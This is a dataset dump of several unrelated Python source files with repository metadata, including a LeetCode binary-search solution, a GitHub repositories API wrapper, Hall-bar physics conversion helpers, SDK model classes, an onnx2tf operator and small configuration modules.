# 本质上是求左边界,因为是求满足比目标值大的数中的最小值,在升序的数组里,“最小”对应的就是左边界
# 左边界,mid指向左,右指针指向mid
while i < j:
mid = (i + j) // 2
if letters[mid] <= target:
i = mid + 1
else:
j = mid
if (i == len(letters) - 1) and (letters[i] > target):
return letters[-1]
if (i == len(letters) - 1) and (letters[i] <= target):
return letters[0]
return letters[i]
@staticmethod
def next_greatest_letter1(letters: List[str], target: str) -> str:
i, j = 0, len(letters) - 1
while i <= j:
mid = (i + j) // 2
if letters[mid] <= target:
i = mid + 1
else:
j = mid - 1
if i == len(letters):
return letters[0]
return letters[i]
@staticmethod
def next_greatest_letter2(letters: List[str], target: str) -> str:
for c in letters:
if c > target:
return c
return letters[0]
if __name__ == '__main__':
s = Solution()
for line in sys.stdin:
target_cur = line.strip()
letters_cur = [i for i in input().split(" ")]
res = s.next_greatest_letter(letters_cur, target_cur)
print(res)
|
[
"[email protected]"
] | |
5eb112988098db6980600c2ca4c2ab2b15e030fc
|
11705b5971757122772cc420912b509b1f39255c
|
/web/service/github/api/v3/repositories/Repositories.py
|
bc527209990819a483f3582a0a1b6414ed875d15
|
[
"CC0-1.0",
"Unlicense",
"Apache-2.0",
"MIT"
] |
permissive
|
ytyaru/GitHub.Upload.Delete.CommentAndFile.201703281815
|
4bff9cba1e6bb2bec596d1190eb653169a01c839
|
ce4d6c3830bff9d9c152d1d6224ad317f46ea778
|
refs/heads/master
| 2021-01-20T08:54:00.762565 | 2017-05-03T22:37:38 | 2017-05-03T22:37:38 | 90,199,212 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,598 |
py
|
#!python3
#encoding
import requests
import urllib.parse
import json
import web.http.Response
class Repositories:
def __init__(self, data, reqp, response):
self.data = data
self.reqp = reqp
self.response = response
def create(self, name, description=None, homepage=None):
method = 'POST'
endpoint = 'user/repos'
params = self.reqp.get(method, endpoint)
params['data'] = json.dumps({"name": name, "description": description, "homepage": homepage})
print(params)
r = requests.post(urllib.parse.urljoin("https://api.github.com", endpoint), headers=params['headers'], data=params['data'])
return self.response.Get(r, res_type='json')
def gets(self, visibility=None, affiliation=None, type=None, sort='full_name', direction=None, per_page=30):
if (visibility is None) and (affiliation is None) and (type is None):
type = 'all'
self.__raise_param_error(visibility, ['all', 'public', 'private'], 'visibility')
if not(None is affiliation):
for a in affiliation.split(','):
self.__raise_param_error(a, ['owner', 'collaborator', 'organization_member'], 'affiliation')
self.__raise_param_error(type, ['all', 'owner', 'public', 'private', 'member'], 'type')
self.__raise_param_error(sort, ['created', 'updated', 'pushed', 'full_name'], 'sort')
if direction is None:
if sort == 'full_name':
direction = 'asc'
else:
direction = 'desc'
else:
self.__raise_param_error(direction, ['asc', 'desc'], 'direction')
method = 'GET'
endpoint = 'user/repos'
params = self.reqp.get(method, endpoint)
params['headers']['Accept'] = 'application/vnd.github.drax-preview+json'
params['params'] = {}
if not(None is visibility):
params['params']["visibility"] = visibility
if not(None is affiliation):
params['params']["affiliation"] = affiliation
if not(None is type):
params['params']["type"] = type
if not(None is sort):
params['params']["sort"] = sort
if not(None is direction):
params['params']["direction"] = direction
if not(None is per_page):
params['params']["per_page"] = per_page
print(params)
repos = []
url = urllib.parse.urljoin("https://api.github.com", endpoint)
while (None is not url):
print(url)
params = self.reqp.update_otp(params)
print(params)
r = requests.get(url, headers=params['headers'], params=params['params'])
repos += self.response.Get(r, res_type='json')
url = self.response.GetLinkNext(r)
return repos
def __raise_param_error(self, target, check_list, target_name):
if not(target is None) and not(target in check_list):
raise Exception("Parameter Error: [{0}] should be one of the following values. : {1}".format(target_name, check_list))
"""
公開リポジトリの一覧を取得する。
@param [int] since is repository id on github.
"""
def list_public_repos(self, since, per_page=30):
method = 'GET'
endpoint = 'repositories'
params = self.reqp.get(method, endpoint)
params['params'] = json.dumps({"since": since, "per_page": per_page})
print(params)
r = requests.get(urllib.parse.urljoin("https://api.github.com", endpoint), headers=params['headers'])
return self.response.Get(r, res_type='json')
"""
リポジトリを削除する。
引数を指定しなければ、デフォルトユーザのカレントディレクトリ名リポジトリを対象とする。
"""
def delete(self, username=None, repo_name=None):
if None is username:
username = self.data.get_username()
if None is repo_name:
repo_name = self.data.get_repo_name()
endpoint = 'repos/:owner/:repo'
params = self.reqp.get('DELETE', endpoint)
endpoint = endpoint.replace(':owner', username)
endpoint = endpoint.replace(':repo', repo_name)
r = requests.delete(urllib.parse.urljoin("https://api.github.com", endpoint), headers=params['headers'])
return self.response.Get(r)
"""
リポジトリを編集する。
リポジトリ名、説明文、homepageを変更する。
指定せずNoneのままなら変更しない。
"""
def edit(self, name=None, description=None, homepage=None):
if None is name:
name = self.data.get_repo_name()
if None is description:
description = self.data.get_repo_description()
if None is homepage:
homepage = self.data.get_repo_homepage()
endpoint = 'repos/:owner/:repo'
params = self.reqp.get('PATCH', endpoint)
endpoint = endpoint.replace(':owner', self.data.get_username())
endpoint = endpoint.replace(':repo', self.data.get_repo_name())
params['data'] = {}
params['data']['name'] = name
if not(None is description or '' == description):
params['data']['description'] = description
if not(None is homepage or '' == homepage):
params['data']['homepage'] = homepage
r = requests.patch(urllib.parse.urljoin("https://api.github.com", endpoint), headers=params['headers'], data=json.dumps(params['data']))
return self.response.Get(r, res_type='json')
"""
リポジトリのプログラミング言語とそのファイルサイズを取得する。
@param {string} usernameはユーザ名
@param {string} repo_nameは対象リポジトリ名
@return {dict} 結果(JSON形式)
"""
def list_languages(self, username=None, repo_name=None):
if None is username:
username = self.reqp.get_username()
if None is repo_name:
repo_name = self.data.get_repo_name()
endpoint = 'repos/:owner/:repo/languages'
params = self.reqp.get('GET', endpoint)
endpoint = endpoint.replace(':owner', username)
endpoint = endpoint.replace(':repo', repo_name)
r = requests.get(urllib.parse.urljoin("https://api.github.com", endpoint), headers=params['headers'])
return self.response.Get(r, res_type='json')
|
[
"[email protected]"
] | |
10c388059eabb303f3a11a60b8fac735303683bb
|
e828fca9d0622710b43222c377adf954df072220
|
/shabanipy/quantum_hall/conversion.py
|
acaf9ac2185f0ef01f596d08336c2ef3d946b958
|
[
"MIT"
] |
permissive
|
jnt299/shabanipy
|
f42cb4abb648e1ce42501a4d1187a74f2a78011c
|
1c2b5b861849ccf76b5ea6aaf0fcbf429aa6bfcf
|
refs/heads/master
| 2022-11-30T17:58:22.295183 | 2020-08-13T19:56:37 | 2020-08-13T19:56:37 | 288,523,531 | 1 | 0 | null | 2020-08-18T17:41:35 | 2020-08-18T17:41:34 | null |
UTF-8
|
Python
| false | false | 3,538 |
py
|
# -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# Copyright 2019 by ShabaniPy Authors, see AUTHORS for more details.
#
# Distributed under the terms of the MIT license.
#
# The full license is in the file LICENCE, distributed with this software.
# -----------------------------------------------------------------------------
"""Typical Hall bar data conversion routines.
"""
from math import pi, log
import numpy as np
import scipy.constants as cs
GEOMETRIC_FACTORS = {
"Van der Pauw": pi / log(2),
"Standard Hall bar": 0.75,
}
def convert_lock_in_meas_to_diff_res(measured_voltage, bias_current):
"""Convert the voltage measured using a lock-in to differential resistance.
"""
return measured_voltage / bias_current
def kf_from_density(density):
"""Compute the Fermi wavevector from the density.
Parameters
----------
density : float | np.ndarray
Carriers density of the sample expected to be in m^-2
Returns
-------
kf : float | np.ndarray
Fermi wavevector in m^-1.
"""
return np.sqrt(2 * np.pi * density)
def mean_free_time_from_mobility(mobility, effective_mass):
"""Compute the mean free time from the sample mobility
Parameters
----------
mobility : float | np.ndarray
Carriers mobility of the sample in m^2s^-2V^-1.
effective_mass : float
Effective mass of the carriers in kg.
Returns
-------
mean_free_time : float | np.ndarray
Mean free time in s.
"""
return mobility * effective_mass / cs.e
def fermi_velocity_from_kf(kf, effective_mass):
"""Compute the Fermi velocity from the Fermi wavelength
Parameters
----------
kf : float | np.ndarray
Fermi wavevector in m^-1.
effective_mass : float | np.ndarray
Effective mass in kg.
Returns
-------
fermi_vel : float | np.ndarray
Fermi velocity in m.s^-1.
"""
return cs.hbar * kf / effective_mass
def fermi_velocity_from_density(density, effective_mass):
"""Compute the Fermi velocity directly from the density.
Parameters
----------
density : : float | np.ndarray
Carriers density of the sample expected to be in m^-2
Returns
-------
fermi_vel : float | np.ndarray
Fermi velocity in m.s^-1.
"""
return fermi_velocity_from_kf(kf_from_density(density), effective_mass)
def diffusion_constant_from_mobility_density(mobility, density, effective_mass):
"""Compute the diffusion constant from mobility and density.
Parameters
----------
mobility : float | np.ndarray
Carriers mobility of the sample m^2s^-sV^-1.
density : : float | np.ndarray
Carriers density of the sample expected to be in m^-2
Returns
-------
diffusion_constant : float | np.ndarray
Diffusion constant of the carriers m^2s^-1.
"""
vf = fermi_velocity_from_density(density, effective_mass)
mft = mean_free_time_from_mobility(mobility, effective_mass)
return vf ** 2 * mft / 2
def htr_from_mobility_density(mobility, density, effective_mass):
"""[summary]
Parameters
----------
mobilities : [type]
[description]
densities : [type]
[description]
Returns
-------
"""
d = diffusion_constant_from_mobility_density(mobility, density, effective_mass)
mft = mean_free_time_from_mobility(mobility, effective_mass)
return cs.hbar / (4 * cs.e * d * mft)
|
[
"[email protected]"
] | |
54b6d697974e94e58e1db9e716971b7d5af3e9b6
|
551b75f52d28c0b5c8944d808a361470e2602654
|
/huaweicloud-sdk-projectman/huaweicloudsdkprojectman/v4/model/list_issue_comments_v4_request.py
|
52fa5da1dc3b94983d614e5dad194057809f34b9
|
[
"Apache-2.0"
] |
permissive
|
wuchen-huawei/huaweicloud-sdk-python-v3
|
9d6597ce8ab666a9a297b3d936aeb85c55cf5877
|
3683d703f4320edb2b8516f36f16d485cff08fc2
|
refs/heads/master
| 2023-05-08T21:32:31.920300 | 2021-05-26T08:54:18 | 2021-05-26T08:54:18 | 370,898,764 | 0 | 0 |
NOASSERTION
| 2021-05-26T03:50:07 | 2021-05-26T03:50:07 | null |
UTF-8
|
Python
| false | false | 4,887 |
py
|
# coding: utf-8
import pprint
import re
import six
class ListIssueCommentsV4Request:
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'project_id': 'str',
'issue_id': 'int',
'offset': 'int',
'limit': 'int'
}
attribute_map = {
'project_id': 'project_id',
'issue_id': 'issue_id',
'offset': 'offset',
'limit': 'limit'
}
def __init__(self, project_id=None, issue_id=None, offset=None, limit=None):
"""ListIssueCommentsV4Request - a model defined in huaweicloud sdk"""
self._project_id = None
self._issue_id = None
self._offset = None
self._limit = None
self.discriminator = None
self.project_id = project_id
self.issue_id = issue_id
if offset is not None:
self.offset = offset
if limit is not None:
self.limit = limit
@property
def project_id(self):
"""Gets the project_id of this ListIssueCommentsV4Request.
项目id
:return: The project_id of this ListIssueCommentsV4Request.
:rtype: str
"""
return self._project_id
@project_id.setter
def project_id(self, project_id):
"""Sets the project_id of this ListIssueCommentsV4Request.
项目id
:param project_id: The project_id of this ListIssueCommentsV4Request.
:type: str
"""
self._project_id = project_id
@property
def issue_id(self):
"""Gets the issue_id of this ListIssueCommentsV4Request.
工作项id
:return: The issue_id of this ListIssueCommentsV4Request.
:rtype: int
"""
return self._issue_id
@issue_id.setter
def issue_id(self, issue_id):
"""Sets the issue_id of this ListIssueCommentsV4Request.
工作项id
:param issue_id: The issue_id of this ListIssueCommentsV4Request.
:type: int
"""
self._issue_id = issue_id
@property
def offset(self):
"""Gets the offset of this ListIssueCommentsV4Request.
分页索引,偏移量
:return: The offset of this ListIssueCommentsV4Request.
:rtype: int
"""
return self._offset
@offset.setter
def offset(self, offset):
"""Sets the offset of this ListIssueCommentsV4Request.
分页索引,偏移量
:param offset: The offset of this ListIssueCommentsV4Request.
:type: int
"""
self._offset = offset
@property
def limit(self):
"""Gets the limit of this ListIssueCommentsV4Request.
每页显示的条数,最大显示100条
:return: The limit of this ListIssueCommentsV4Request.
:rtype: int
"""
return self._limit
@limit.setter
def limit(self, limit):
"""Sets the limit of this ListIssueCommentsV4Request.
每页显示的条数,最大显示100条
:param limit: The limit of this ListIssueCommentsV4Request.
:type: int
"""
self._limit = limit
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ListIssueCommentsV4Request):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
[
"[email protected]"
] | |
24ab81ff2c511dd5587eebf58083e235fd9bdec7
|
3c000380cbb7e8deb6abf9c6f3e29e8e89784830
|
/venv/Lib/site-packages/cobra/modelimpl/fc/apinninglbl.py
|
f7b4c92b96d82adacf7230e8ed621d61e9384b9f
|
[] |
no_license
|
bkhoward/aciDOM
|
91b0406f00da7aac413a81c8db2129b4bfc5497b
|
f2674456ecb19cf7299ef0c5a0887560b8b315d0
|
refs/heads/master
| 2023-03-27T23:37:02.836904 | 2021-03-26T22:07:54 | 2021-03-26T22:07:54 | 351,855,399 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,523 |
py
|
# coding=UTF-8
# **********************************************************************
# Copyright (c) 2013-2020 Cisco Systems, Inc. All rights reserved
# written by zen warriors, do not modify!
# **********************************************************************
from cobra.mit.meta import ClassMeta
from cobra.mit.meta import StatsClassMeta
from cobra.mit.meta import CounterMeta
from cobra.mit.meta import PropMeta
from cobra.mit.meta import Category
from cobra.mit.meta import SourceRelationMeta
from cobra.mit.meta import NamedSourceRelationMeta
from cobra.mit.meta import TargetRelationMeta
from cobra.mit.meta import DeploymentPathMeta, DeploymentCategory
from cobra.model.category import MoCategory, PropCategory, CounterCategory
from cobra.mit.mo import Mo
# ##################################################
class APinningLbl(Mo):
meta = ClassMeta("cobra.model.fc.APinningLbl")
meta.isAbstract = True
meta.moClassName = "fcAPinningLbl"
meta.moClassName = "fcAPinningLbl"
meta.rnFormat = ""
meta.category = MoCategory.REGULAR
meta.label = "Abstract Fibre Channel Uplink Pinning Label"
meta.writeAccessMask = 0x601
meta.readAccessMask = 0x601
meta.isDomainable = False
meta.isReadOnly = False
meta.isConfigurable = True
meta.isDeletable = True
meta.isContextRoot = False
meta.childClasses.add("cobra.model.fault.Delegate")
meta.childNamesAndRnPrefix.append(("cobra.model.fault.Delegate", "fd-"))
meta.superClasses.add("cobra.model.naming.NamedObject")
meta.superClasses.add("cobra.model.pol.Obj")
meta.superClasses.add("cobra.model.pol.Def")
meta.concreteSubClasses.add("cobra.model.fc.PinningLbl")
meta.concreteSubClasses.add("cobra.model.fc.PinningLblDef")
meta.rnPrefixes = [
]
prop = PropMeta("str", "childAction", "childAction", 4, PropCategory.CHILD_ACTION)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("deleteAll", "deleteall", 16384)
prop._addConstant("deleteNonPresent", "deletenonpresent", 8192)
prop._addConstant("ignore", "ignore", 4096)
meta.props.add("childAction", prop)
prop = PropMeta("str", "descr", "descr", 5579, PropCategory.REGULAR)
prop.label = "Description"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 128)]
prop.regex = ['[a-zA-Z0-9\\!#$%()*,-./:;@ _{|}~?&+]+']
meta.props.add("descr", prop)
prop = PropMeta("str", "dn", "dn", 1, PropCategory.DN)
prop.label = "None"
prop.isDn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("dn", prop)
prop = PropMeta("str", "name", "name", 4991, PropCategory.REGULAR)
prop.label = "Name"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 64)]
prop.regex = ['[a-zA-Z0-9_.:-]+']
meta.props.add("name", prop)
prop = PropMeta("str", "nameAlias", "nameAlias", 28417, PropCategory.REGULAR)
prop.label = "Name alias"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 63)]
prop.regex = ['[a-zA-Z0-9_.-]+']
meta.props.add("nameAlias", prop)
prop = PropMeta("str", "ownerKey", "ownerKey", 15230, PropCategory.REGULAR)
prop.label = "None"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 128)]
prop.regex = ['[a-zA-Z0-9\\!#$%()*,-./:;@ _{|}~?&+]+']
meta.props.add("ownerKey", prop)
prop = PropMeta("str", "ownerTag", "ownerTag", 15231, PropCategory.REGULAR)
prop.label = "None"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 64)]
prop.regex = ['[a-zA-Z0-9\\!#$%()*,-./:;@ _{|}~?&+]+']
meta.props.add("ownerTag", prop)
prop = PropMeta("str", "rn", "rn", 2, PropCategory.RN)
prop.label = "None"
prop.isRn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("rn", prop)
prop = PropMeta("str", "status", "status", 3, PropCategory.STATUS)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("created", "created", 2)
prop._addConstant("deleted", "deleted", 8)
prop._addConstant("modified", "modified", 4)
meta.props.add("status", prop)
def __init__(self, parentMoOrDn, markDirty=True, **creationProps):
namingVals = []
Mo.__init__(self, parentMoOrDn, markDirty, *namingVals, **creationProps)
# End of package file
# ##################################################
|
[
"[email protected]"
] | |
31212698b833a9003fd16b7a5fc99096aa8e5d13
|
b39b0625795b0640a6a68151f2012ce139f423b8
|
/iaas/test/test_flavor_profile_api.py
|
095a47c5a2b57f517a3c35c6945e5b54508299a9
|
[] |
no_license
|
darrylcauldwell/casCodegen
|
8e82b1f08e8260482996aec3d8be10934a65dd03
|
1f1ff9ab8a33102bcfcb8be276d51992d96bcb61
|
refs/heads/master
| 2020-07-27T14:42:28.550855 | 2019-09-17T18:30:28 | 2019-09-17T18:30:28 | 209,127,702 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,495 |
py
|
# coding: utf-8
"""
VMware Cloud Assembly IaaS API
A multi-cloud IaaS API for Cloud Automation Services # noqa: E501
OpenAPI spec version: 2019-01-15
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import swagger_client
from api.flavor_profile_api import FlavorProfileApi # noqa: E501
from swagger_client.rest import ApiException
class TestFlavorProfileApi(unittest.TestCase):
"""FlavorProfileApi unit test stubs"""
def setUp(self):
self.api = api.flavor_profile_api.FlavorProfileApi() # noqa: E501
def tearDown(self):
pass
def test_create_flavor_profile(self):
"""Test case for create_flavor_profile
Create flavor profile # noqa: E501
"""
pass
def test_delete_flavor_profile(self):
"""Test case for delete_flavor_profile
Delete flavor profile # noqa: E501
"""
pass
def test_get_flavor_profile(self):
"""Test case for get_flavor_profile
Get flavor profile # noqa: E501
"""
pass
def test_get_flavor_profiles(self):
"""Test case for get_flavor_profiles
Get flavor profile # noqa: E501
"""
pass
def test_update_flavor_profile(self):
"""Test case for update_flavor_profile
Update flavor profile # noqa: E501
"""
pass
if __name__ == '__main__':
unittest.main()
|
[
"[email protected]"
] | |
1ba90dd656c8980eff31b4972d50accaaff84971
|
971e0efcc68b8f7cfb1040c38008426f7bcf9d2e
|
/tests/artificial/transf_Quantization/trend_MovingAverage/cycle_30/ar_/test_artificial_1024_Quantization_MovingAverage_30__20.py
|
1d8cd7fcd6989efe67729b85e14bd6887518a581
|
[
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
antoinecarme/pyaf
|
a105d172c2e7544f8d580d75f28b751351dd83b6
|
b12db77cb3fa9292e774b2b33db8ce732647c35e
|
refs/heads/master
| 2023-09-01T09:30:59.967219 | 2023-07-28T20:15:53 | 2023-07-28T20:15:53 | 70,790,978 | 457 | 77 |
BSD-3-Clause
| 2023-03-08T21:45:40 | 2016-10-13T09:30:30 |
Python
|
UTF-8
|
Python
| false | false | 273 |
py
|
import pyaf.Bench.TS_datasets as tsds
import tests.artificial.process_artificial_dataset as art
art.process_dataset(N = 1024 , FREQ = 'D', seed = 0, trendtype = "MovingAverage", cycle_length = 30, transform = "Quantization", sigma = 0.0, exog_count = 20, ar_order = 0);
|
[
"[email protected]"
] | |
e0d15eea5b6d89432ba750f5c3a61bdb7bd0ce84
|
730103ddecd23142238defe2a2b1ab3c582cdc45
|
/onnx2tf/ops/ReverseSequence.py
|
c2c8dc8337c257539be89abccb5dab2eb3372482
|
[
"Apache-2.0",
"MIT"
] |
permissive
|
PINTO0309/onnx2tf
|
dcfb0fd8a4810ef1262aa565ba42b5124012bdb2
|
b0e7d106cc69c0ea0fd464c4dd9064a5b0d6668b
|
refs/heads/main
| 2023-08-30T23:28:56.386741 | 2023-08-29T01:48:40 | 2023-08-29T01:48:40 | 541,831,874 | 345 | 45 |
MIT
| 2023-09-14T16:53:12 | 2022-09-27T00:06:32 |
Python
|
UTF-8
|
Python
| false | false | 3,308 |
py
|
import random
random.seed(0)
import numpy as np
np.random.seed(0)
import tensorflow as tf
import onnx_graphsurgeon as gs
from onnx2tf.utils.common_functions import (
get_constant_or_variable,
print_node_info,
inverted_operation_enable_disable,
make_tf_node_info,
get_replacement_parameter,
pre_process_transpose,
post_process_transpose,
)
@print_node_info
@inverted_operation_enable_disable
@get_replacement_parameter
def make_node(
*,
graph_node: gs.Node,
tf_layers_dict: dict,
**kwargs: dict,
):
"""ReverseSequence
Parameters
----------
graph_node: gs.Node
graph_surgeon Node
tf_layers_dict: dict
optype, shape, dtype, tensorflow graph
"""
before_op_output_shape_trans_1 = \
tf_layers_dict.get(graph_node.inputs[0].name, {}).get('before_op_output_shape_trans', True)
before_op_output_shape_trans = \
before_op_output_shape_trans_1
graph_node_input_1 = get_constant_or_variable(
graph_node.inputs[0],
before_op_output_shape_trans,
)
input_tensor = tf_layers_dict[graph_node_input_1.name]['tf_node'] \
if isinstance(graph_node_input_1, gs.Variable) else graph_node_input_1
graph_node_input_2 = get_constant_or_variable(
graph_node.inputs[1],
before_op_output_shape_trans,
)
sequence_lens = tf_layers_dict[graph_node_input_2.name]['tf_node'] \
if isinstance(graph_node_input_2, gs.Variable) else graph_node_input_2
graph_node_output: gs.Variable = graph_node.outputs[0]
shape = graph_node_output.shape
dtype = graph_node_output.dtype
batch_axis = graph_node.attrs.get('batch_axis', 1)
time_axis = graph_node.attrs.get('time_axis', 0)
# Preserving Graph Structure (Dict)
tf_layers_dict[graph_node_output.name] = {
'optype': graph_node.op,
'shape': shape,
'dtype': dtype,
}
# Pre-process transpose
input_tensor = pre_process_transpose(
value_before_transpose=input_tensor,
param_target='inputs',
param_name=graph_node.inputs[0].name,
**kwargs,
)
# Generation of TF OP
tf_layers_dict[graph_node_output.name]['tf_node'] = \
tf.reverse_sequence(
input=input_tensor,
seq_lengths=sequence_lens,
seq_axis=time_axis,
batch_axis=batch_axis,
name=graph_node.name,
)
# Post-process transpose
tf_layers_dict[graph_node_output.name]['tf_node'] = post_process_transpose(
value_before_transpose=tf_layers_dict[graph_node_output.name]['tf_node'],
param_target='outputs',
param_name=graph_node.outputs[0].name,
**kwargs,
)
# Generation of Debug Info
tf_layers_dict[graph_node_output.name]['tf_node_info'] = \
make_tf_node_info(
node_info={
'tf_op_type': tf.reverse_sequence,
'tf_inputs': {
'input': input_tensor,
'seq_lengths': sequence_lens,
'seq_axis': time_axis,
'batch_axis': batch_axis,
},
'tf_outputs': {
'output': tf_layers_dict[graph_node_output.name]['tf_node'],
},
}
)
|
[
"[email protected]"
] | |
979b699a367d604f9353cf9805004d4f0d43b7c5
|
966280ab617298a3ced79bc60189b301c795067a
|
/Sliding-Window/239_sliding_window_maximum.py
|
445ece104ef138fc8ad1d83b3627505908fe52ce
|
[] |
no_license
|
Rishabhh/LeetCode-Solutions
|
c0382e5ba5b77832322c992418f697f42213620f
|
2536744423ee9dc7da30e739eb0bca521c216f00
|
refs/heads/master
| 2020-06-10T02:37:42.103289 | 2019-05-29T06:38:02 | 2019-05-29T06:38:02 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 569 |
py
|
import collections
class Solution:
def max_sliding_window(self, nums, k):
"""
:type nums: List[int]
:type k: int
:rtype: List[int]
"""
res = []
q = collections.deque()
n = len(nums)
for i in range(n):
while q and q[-1][1] <= nums[i]:
q.pop()
q.append((i, nums[i]))
if i >= k:
while q and q[0][0] <= i - k:
q.popleft()
if i >= k - 1:
res.append(q[0][1])
return res
|
[
"[email protected]"
] | |
c16526cc565c48f7f41dbc963e284d4f5ce44160
|
3e1fcf34eae508a3f3d4668edfb334069a88db3d
|
/court_scraper/configs.py
|
3c97d17d3c3bde34e18c1f667fb59a09be10a102
|
[
"ISC"
] |
permissive
|
mscarey/court-scraper
|
26d32cb7354b05bb5d5d27a55bf4042e5dde1a4d
|
e29135331526a11aa5eb0445a9223fc3f7630895
|
refs/heads/main
| 2023-07-14T20:23:33.488766 | 2020-08-31T14:02:19 | 2020-08-31T14:02:19 | 384,977,976 | 0 | 0 |
ISC
| 2021-07-11T15:04:57 | 2021-07-11T15:04:57 | null |
UTF-8
|
Python
| false | false | 539 |
py
|
import os
from pathlib import Path
class Configs:
def __init__(self):
try:
self.cache_dir = os.environ['COURT_SCRAPER_DIR']
except KeyError:
self.cache_dir = str(
Path(os.path.expanduser('~'))\
.joinpath('.court-scraper')
)
self.config_file_path = str(
Path(self.cache_dir)\
.joinpath('config.yaml')
)
self.db_path = str(
Path(self.cache_dir)\
.joinpath('cases.db')
)
|
[
"[email protected]"
] | |
a94d4f6646875930d94d09068b21013e8e11c0b4
|
19d47d47c9614dddcf2f8d744d883a90ade0ce82
|
/pynsxt/swagger_client/models/app_info_host_vm_list_in_csv_format.py
|
c68bd8aec7c8d133e43bc961f5b83387b9a11720
|
[] |
no_license
|
darshanhuang1/pynsxt-1
|
9ed7c0da9b3a64e837a26cbbd8b228e811cee823
|
fb1091dff1af7f8b8f01aec715682dea60765eb8
|
refs/heads/master
| 2020-05-25T14:51:09.932853 | 2018-05-16T12:43:48 | 2018-05-16T12:43:48 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,356 |
py
|
# coding: utf-8
"""
NSX API
VMware NSX REST API # noqa: E501
OpenAPI spec version: 1.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
from swagger_client.models.app_info_host_vm_csv_record import AppInfoHostVmCsvRecord # noqa: F401,E501
from swagger_client.models.csv_list_result import CsvListResult # noqa: F401,E501
class AppInfoHostVmListInCsvFormat(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'file_name': 'str',
'results': 'list[AppInfoHostVmCsvRecord]'
}
attribute_map = {
'file_name': 'file_name',
'results': 'results'
}
def __init__(self, file_name=None, results=None): # noqa: E501
"""AppInfoHostVmListInCsvFormat - a model defined in Swagger""" # noqa: E501
self._file_name = None
self._results = None
self.discriminator = None
if file_name is not None:
self.file_name = file_name
if results is not None:
self.results = results
@property
def file_name(self):
"""Gets the file_name of this AppInfoHostVmListInCsvFormat. # noqa: E501
File name set by HTTP server if API returns CSV result as a file. # noqa: E501
:return: The file_name of this AppInfoHostVmListInCsvFormat. # noqa: E501
:rtype: str
"""
return self._file_name
@file_name.setter
def file_name(self, file_name):
"""Sets the file_name of this AppInfoHostVmListInCsvFormat.
File name set by HTTP server if API returns CSV result as a file. # noqa: E501
:param file_name: The file_name of this AppInfoHostVmListInCsvFormat. # noqa: E501
:type: str
"""
self._file_name = file_name
@property
def results(self):
"""Gets the results of this AppInfoHostVmListInCsvFormat. # noqa: E501
List of appplications discovered during an application discovery session # noqa: E501
:return: The results of this AppInfoHostVmListInCsvFormat. # noqa: E501
:rtype: list[AppInfoHostVmCsvRecord]
"""
return self._results
@results.setter
def results(self, results):
"""Sets the results of this AppInfoHostVmListInCsvFormat.
List of appplications discovered during an application discovery session # noqa: E501
:param results: The results of this AppInfoHostVmListInCsvFormat. # noqa: E501
:type: list[AppInfoHostVmCsvRecord]
"""
self._results = results
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, AppInfoHostVmListInCsvFormat):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
[
"[email protected]"
] | |
6f1ce69f66b79c11989426517bab38e317a3e9f1
|
0b63f38c7fb468e478e5be82c685de1b7ddb87e5
|
/meiduo/meiduo_mall/meiduo_mall/apps/goods/serializers.py
|
5f87ef206f4094af198abe31f08914950ba75438
|
[
"MIT"
] |
permissive
|
Highsir/Simplestore
|
fcf5ef81a754604c0953a3c1433a7bc09290c121
|
